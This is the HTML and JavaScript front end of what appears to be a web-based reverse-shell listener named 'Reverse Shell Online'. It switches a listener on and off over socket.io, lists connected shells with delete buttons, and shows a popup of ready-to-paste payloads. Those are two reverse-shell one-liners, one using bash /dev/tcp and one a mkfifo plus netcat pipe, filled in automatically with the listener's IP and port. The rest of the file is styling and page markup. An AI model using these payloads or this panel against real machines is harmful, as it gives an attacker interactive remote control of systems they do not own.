<!DOCTYPE html>
<html>

<head>
    <title>Reverse Shell Online</title>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Roboto&display=swap" rel="stylesheet">
</head>
<script src="/socket.io/socket.io.js"></script>
<script>
    let loading = true
    let IP = null
    let PORT = null
    const socket = io();
    socket.on('shells', shells => {
        updateShellList(shells)
    })
    socket.on('state', ({ state, ip }) => {
        // console.log(state);
        $('#switch').prop('disabled', false);
        $('#switch').prop('checked', state);
        if (state) {
            IP = ip.split(':')[0]
            PORT = ip.split(':')[1]
            $('#ip_status').html(`Listening on ${ip}`)
        }
        else
            $('#ip_status').html(`Wait`)
        setLoading(false)
    })

    function updateShellList (shells) {
        $('#shellList').empty()
        for (const shell of shells) {
            $('#shellList').append(`
                <li><a href="${shell.id}">Shell #${shell.id}</a><p onclick="removeShell('${shell.id}')">Delete</p></li>
            `)
        }

    }

    let PAYLOADS = [
        'sh -i >& /dev/tcp/$IP/$PORT 0>&1',
        'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $IP $PORT >/tmp/f',
    ]

    function getPayloads () {
        return PAYLOADS.map(p => p.replace('$IP', IP).replace('$PORT', PORT))
    }

    function removeShell (id) {
        socket.emit('delete', id)
    }

    function setLoading (load) {
        loading = load
        if (load) {
            $('#switch-label').addClass('loading')
        } else {
            $('#switch-label').removeClass('loading')
        }
    }


    $(() => {
        $('#switch-label').click(function () {
            if (loading) return
            socket.emit('state', $('#switch').is(":checked"))
            setLoading(true)
        })
        $(".trigger_popup_fricc").click(function () {

            $('#payloads').html("")
            for (const payload of getPayloads()) {
                $('#payloads').append(`<p>${payload}</p>`)
            }

            $('.hover_bkgr_fricc').show();
        });
        $('.hover_bkgr_fricc').click(function () {
            $('.hover_bkgr_fricc').hide();
        });
    })


</script>

<style>
    /* http://meyerweb.com/eric/tools/css/reset/ 
   v2.0 | 20110126
   License: none (public domain)
*/


    * {
        margin: 0;
        padding: 0;
        font-family: 'Roboto', sans-serif;
        overflow: hidden;
    }

    input[type=checkbox] {
        height: 0;
        width: 0;
        visibility: hidden;
    }

    label {
        cursor: pointer;
        text-indent: -9999px;
        width: 200px;
        height: 70px;
        background: rgb(255, 76, 76);
        display: block;
        border-radius: 100px;
        position: relative;
    }

    label:after {
        content: '';
        position: absolute;
        top: 5px;
        left: 5px;
        width: 60px;
        height: 60px;
        background: #fff;
        border-radius: 60px;
        transition: 0.3s;
    }

    label.loading:after {
        left: calc(40% - 5px);
        background-color: rgb(160, 160, 160);
    }

    input:checked+label {
        background: #bada55;
    }

    input:checked+label:after {
        left: calc(100% - 5px);
        transform: translateX(-100%);
    }

    input:checked+label.loading:after {
        left: calc(40% - 5px);
        transform: translateX(0);
    }

    body {
        vertical-align: baseline;
        height: 100vh;
        background-color: rgb(19, 19, 19);
        line-height: 1;
    }

    #top {
        height: 200px;
        color: rgb(255, 241, 116);
        font-size: larger;
        margin-top: 50px;
        display: flex;
        justify-content: center;
        align-items: center;
        flex-direction: column;
    }

    #shellList li {
        display: flex;
        justify-content: center;
    }

    #shellList li a {
        background-color: #bada55;
        padding: 8px;
        border-radius: 3px;
        color: rgb(0, 0, 0);
        cursor: pointer;
    }

    #shellList li p {
        background-color: #ff2a2a;
        padding: 8px;
        border-radius: 3px;
        color: rgb(0, 0, 0);
        cursor: pointer;
        margin-left: 10px;
    }

    a {
        text-decoration: none;
        color: inherit
    }

    .hover_bkgr_fricc {
        background: rgba(0, 0, 0, .4);
        cursor: pointer;
        display: none;
        height: 100%;
        position: fixed;
        text-align: center;
        top: 0;
        width: 100%;
        z-index: 10000;
    }

    .hover_bkgr_fricc .helper {
        display: inline-block;
        height: 100%;
        vertical-align: middle;
    }

    .hover_bkgr_fricc>div {
        background-color: #fff;
        box-shadow: 10px 10px 60px #555;
        display: inline-block;
        height: auto;
        max-width: 551px;
        min-height: 100px;
        vertical-align: middle;
        width: 60%;
        position: relative;
        border-radius: 8px;
        padding: 15px 5%;
    }

    .popupCloseButton {
        background-color: #fff;
        border: 3px solid #999;
        border-radius: 50px;
        cursor: pointer;
        display: inline-block;
        font-family: arial;
        font-weight: bold;
        position: absolute;
        top: -20px;
        right: -20px;
        font-size: 25px;
        line-height: 30px;
        width: 30px;
        height: 30px;
        text-align: center;
    }

    .popupCloseButton:hover {
        background-color: #ccc;
    }

    .trigger_popup_fricc {
        cursor: pointer;
        font-size: 20px;
        margin: 20px;
        display: inline-block;
        font-weight: bold;
    }
</style>

<body>
    <div class="hover_bkgr_fricc">
        <span class="helper"></span>
        <div id="payloads">
            <p>Server isn't listening</p>
        </div>
    </div>
    <div id="top">
        <a class="trigger_popup_fricc" style="text-align: left; font-size: smaller;">Payloads</a>


        <p id="ip_status" style="text-align: center">Wait for socket...</p>
        <!-- Toggle -->
        <div>
            <input type="checkbox" id="switch" disabled /><label id="switch-label">On</label>
        </div>
    </div>
    <!-- Shell list -->
    <ul id="shellList">

    </ul>
</body>

</html>